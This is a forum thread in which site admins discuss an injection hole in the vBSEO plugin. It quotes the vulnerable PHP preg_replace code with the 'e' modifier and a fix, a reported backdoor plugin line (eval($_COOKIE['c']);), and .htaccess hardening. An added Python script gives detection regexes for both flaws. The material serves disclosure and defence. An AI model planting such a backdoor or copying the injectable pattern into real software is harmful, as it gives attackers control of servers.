Possible Exploit

  • Jafo
    replied
    Originally posted by Talaturen
    It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!
    You are wrong, the patch was NOT in 3.6.0 until we discovered this TODAY. I know, I checked.


  • Loco.M
    replied
    Originally posted by Jafo
    Here it is folks, in functions_vbseocp_abstract.php

    PHP Code:
    public static function proc_deutf($ptxt, $tocharset)
    {
        $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
        return $ptxt;
    }

    I recommended a patch here over a YEAR ago when we were getting hacked and they said they were going to put it in the latest version.. They did not.. This needs to be:

    PHP Code:
    public static function proc_deutf($ptxt, $tocharset)
    {
        $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);
        return $ptxt;
    }

    Ouch.. that's a lot of sites at risk for a year..


  • Talaturen
    replied
    It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!


  • briansol
    replied
    http://www.vbseo.com/f5/vbseo-securi...release-52783/


  • DigitalCrowd
    replied
    Yep, I removed it as soon as I saw it.


  • Wayne Luke
    replied
    Originally posted by DigitalCrowd
    I have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However a few sites all with vBSEO have them. One site had a "test" plugin for ajax_complete and it referenced:

    eval($_COOKIE['c']);

    Here is a site that references a PHP compromise with similar code...

    http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.dis9.com/tools&ei=nH8dT9XALMSKsQLH4dSdCw&sa=X&oi=translate&ct=result&resnum=2&ved=0CDYQ7gEwAQ&prev=/search%3Fq%3Deval(%24_COOKIE%5B%27c%27%5D)%3B%26hl%3Den%26safe%3Doff%26client%3Dsafari%26r ls%3Den%26prmd%3Dimvns

    This is a very bad plugin. Very bad. You need to remove it as quickly as possible. With it, your attackers could gain access to your entire server.


  • briansol
    replied
    FYI, the bug has been confirmed and a patch release is en route.


  • kau
    replied
    It is vBSEO.

    All our non-vBSEO sites did not get hacked.

    All our vBSEO sites without "Add Page Titles to External Links Anchor Text" enabled did not get hacked.

    All our vBSEO sites with "Add Page Titles to External Links Anchor Text" enabled got hacked.

    We have every single directory properly permissioned via Apache CONF file and by hand issuing CHMOD commands. We also have our AdminCP in a different directory and it is password protected through .htpasswd.

    There are no entries in Control Panel logs that relate to this plugin creation. It was done via injection.


  • Jafo
    replied
    Originally posted by Ace
    Just in case - you do have the following .htaccess protection in all writable directories?

    Code:
    <Files ~ "\.(php\d*|cgi|pl|phtml)$">
    order allow,deny
    deny from all
    </Files>
    Yes we do and we even have admincp and vbseocp.php protected by apache auth..

    Trust me, the reason this happened is because that patch was missing.. Bots have been searching for this exploit for almost a year now.. When we upgraded to 3.6.0 the hole was reopened and the bots did what they do.


  • Ace
    replied
    Just in case - you do have the following .htaccess protection in all writable directories?

    Code:
    <Files ~ "\.(php\d*|cgi|pl|phtml)$">
    order allow,deny
    deny from all
    </Files>


  • Jafo
    replied
    Just got a confirmation from vbseo that the patch was in their repo, but not in the current version. They said they have updated the current version just now to include the patch.. I really hope they notify their customer base because this exploit is a year old. Bots are probably pre-programmed with this attack vector and there are likely hundreds of them. If you have updated vbseo in the last year, you stand a good chance of being vulnerable. UPGRADE YOUR INSTALL NOW!


  • Jafo
    replied
    Brianso, please look at the above code.. We went through this a year ago, you guys worked with us to supply the patch, but you guys never included it in your product! That is why we got hit, because we just upgraded to the latest version.


  • briansol
    replied
    Title replaces happen real-time as the page is pulled. These are not stored anywhere.

    I highly suggest checking your server logs for more detailed information or entries relating to product changes.


  • Jafo
    replied
    Here it is folks, in functions_vbseocp_abstract.php

    PHP Code:
    public static function proc_deutf($ptxt, $tocharset)
    {
        $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
        return $ptxt;
    }

    I recommended a patch here over a YEAR ago when we were getting hacked and they said they were going to put it in the latest version.. They did not.. This needs to be:

    PHP Code:
    public static function proc_deutf($ptxt, $tocharset)
    {
        $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);
        return $ptxt;
    }

    Last edited by Jafo; Mon 23 Jan '12, 7:32am.
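
Added example (not code from any poster in this thread or from vBSEO): a small Python audit over PHP source that flags the two things this thread tells admins to look for, a `preg_replace()` call that uses the `e` modifier with a double-quoted backreference as in the `proc_deutf()` line above, and plugin code that passes request data to `eval()` like the `eval($_COOKIE['c']);` plugin reported earlier in the thread. It goes slightly beyond the thread by also flagging `$_GET`, `$_POST` and `$_REQUEST`; the finding names and sample strings are constructed for the example, and the line-based regexes are a heuristic, not a PHP parser.

```python
import re

# preg_replace('<delim>...<delim><modifiers including "e">',
# The "e" modifier makes PHP evaluate the replacement string as code.
E_MODIFIER = re.compile(
    r"""preg_replace\s*\(\s*(['"])(.)(?:\\.|(?!\2)[^\\])*\2[a-zA-Z]*e[a-zA-Z]*\1\s*,""")
# A capture group interpolated inside a double-quoted PHP string, e.g. "$1"
DQ_BACKREF = re.compile(r'"[^"]*\$\{?\d+[^"]*"')
# eval() fed straight from request data, e.g. eval($_COOKIE['c']);
REQUEST_EVAL = re.compile(r"eval\s*\(\s*\$_(?:COOKIE|GET|POST|REQUEST)\b")


def audit_php(source):
    """Return (line_number, finding) pairs for one PHP source string."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = E_MODIFIER.search(line)
        if m:
            # Only the text after the pattern argument can hold the replacement.
            replacement = line[m.end():]
            if DQ_BACKREF.search(replacement):
                findings.append((lineno, "preg-e-double-quoted-backref"))
            else:
                findings.append((lineno, "preg-e-modifier"))
        if REQUEST_EVAL.search(line):
            findings.append((lineno, "eval-of-request-data"))
    return findings


# Constructed samples: the two proc_deutf() lines quoted in the thread and the
# one-line plugin body reported there.
SAMPLE_ORIGINAL = r"""$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);"""
SAMPLE_PATCHED = r"""$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);"""
SAMPLE_PLUGIN = "eval($_COOKIE['c']);"

if __name__ == "__main__":
    for name, src in (("original", SAMPLE_ORIGINAL),
                      ("patched", SAMPLE_PATCHED),
                      ("plugin", SAMPLE_PLUGIN)):
        print(name, audit_php(src))
```

The `e` modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so a `preg-e-modifier` finding is a prompt to move that call to `preg_replace_callback()`.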


  • Ace
    replied
    OK. Best of luck figuring it out, I'm watching your ticket with great interest.

    <-- works there.
